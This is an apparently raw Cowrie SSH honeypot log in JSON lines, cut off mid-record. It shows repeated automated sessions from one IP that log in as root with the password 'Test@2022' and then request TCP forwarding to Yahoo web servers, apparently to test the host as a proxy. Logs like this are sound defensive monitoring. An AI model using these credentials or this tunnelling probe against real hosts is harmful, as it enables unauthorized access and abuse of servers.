{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.095269Z","src_ip":"213.209.150.239","session":"196ddf79f334"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.329452Z","src_ip":"213.209.150.239","session":"196ddf79f334"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":9048,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9048","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.377519Z","session":"196ddf79f334"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.424766Z","src_ip":"213.209.150.239","session":"196ddf79f334"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":19823,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19823","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.561576Z","session":"196ddf79f334"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.608774Z","src_ip":"213.209.150.239","session":"196ddf79f334"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.657911Z","src_ip":"213.209.150.239","session":"196ddf79f334"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64069,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ad0e1584c34","protocol":"ssh","message":"New connection: 213.209.150.239:64069 (1.2.3.4:22) [session: 8ad0e1584c34]","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.713953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.714853Z","src_ip":"213.209.150.239","session":"8ad0e1584c34"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:24.771546Z","src_ip":"213.209.150.239","session":"8ad0e1584c34"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.054478Z","src_ip":"213.209.150.239","session":"8ad0e1584c34"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":3822,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3822","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.111972Z","session":"8ad0e1584c34"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.168874Z","src_ip":"213.209.150.239","session":"8ad0e1584c34"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":1301,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:1301","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.327145Z","session":"8ad0e1584c34"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.383985Z","src_ip":"213.209.150.239","session":"8ad0e1584c34"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.441510Z","src_ip":"213.209.150.239","session":"8ad0e1584c34"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64116,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b0ed1a58efd","protocol":"ssh","message":"New connection: 213.209.150.239:64116 (1.2.3.4:22) [session: 4b0ed1a58efd]","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.497024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.497683Z","src_ip":"213.209.150.239","session":"4b0ed1a58efd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.554400Z","src_ip":"213.209.150.239","session":"4b0ed1a58efd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.836869Z","src_ip":"213.209.150.239","session":"4b0ed1a58efd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11028,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11028","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.895298Z","session":"4b0ed1a58efd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:25.952110Z","src_ip":"213.209.150.239","session":"4b0ed1a58efd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":2354,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:2354","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.107157Z","session":"4b0ed1a58efd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.163992Z","src_ip":"213.209.150.239","session":"4b0ed1a58efd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.221573Z","src_ip":"213.209.150.239","session":"4b0ed1a58efd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64173,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b0e75a62f11","protocol":"ssh","message":"New connection: 213.209.150.239:64173 (1.2.3.4:22) [session: 0b0e75a62f11]","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.277513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.278326Z","src_ip":"213.209.150.239","session":"0b0e75a62f11"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.335174Z","src_ip":"213.209.150.239","session":"0b0e75a62f11"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.618605Z","src_ip":"213.209.150.239","session":"0b0e75a62f11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":23077,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:23077","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.676291Z","session":"0b0e75a62f11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.733602Z","src_ip":"213.209.150.239","session":"0b0e75a62f11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16416,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16416","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.887148Z","session":"0b0e75a62f11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:26.943866Z","src_ip":"213.209.150.239","session":"0b0e75a62f11"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.001476Z","src_ip":"213.209.150.239","session":"0b0e75a62f11"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64205,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fff72ab3a12","protocol":"ssh","message":"New connection: 213.209.150.239:64205 (1.2.3.4:22) [session: 2fff72ab3a12]","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.056881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.057921Z","src_ip":"213.209.150.239","session":"2fff72ab3a12"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.114759Z","src_ip":"213.209.150.239","session":"2fff72ab3a12"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.396931Z","src_ip":"213.209.150.239","session":"2fff72ab3a12"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":12134,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:12134","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.454554Z","session":"2fff72ab3a12"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.511365Z","src_ip":"213.209.150.239","session":"2fff72ab3a12"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":8802,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8802","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.667105Z","session":"2fff72ab3a12"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.723681Z","src_ip":"213.209.150.239","session":"2fff72ab3a12"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.781853Z","src_ip":"213.209.150.239","session":"2fff72ab3a12"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64272,"dst_ip":"1.2.3.4","dst_port":22,"session":"82e5922e26e5","protocol":"ssh","message":"New connection: 213.209.150.239:64272 (1.2.3.4:22) [session: 82e5922e26e5]","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.827840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.828799Z","src_ip":"213.209.150.239","session":"82e5922e26e5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh 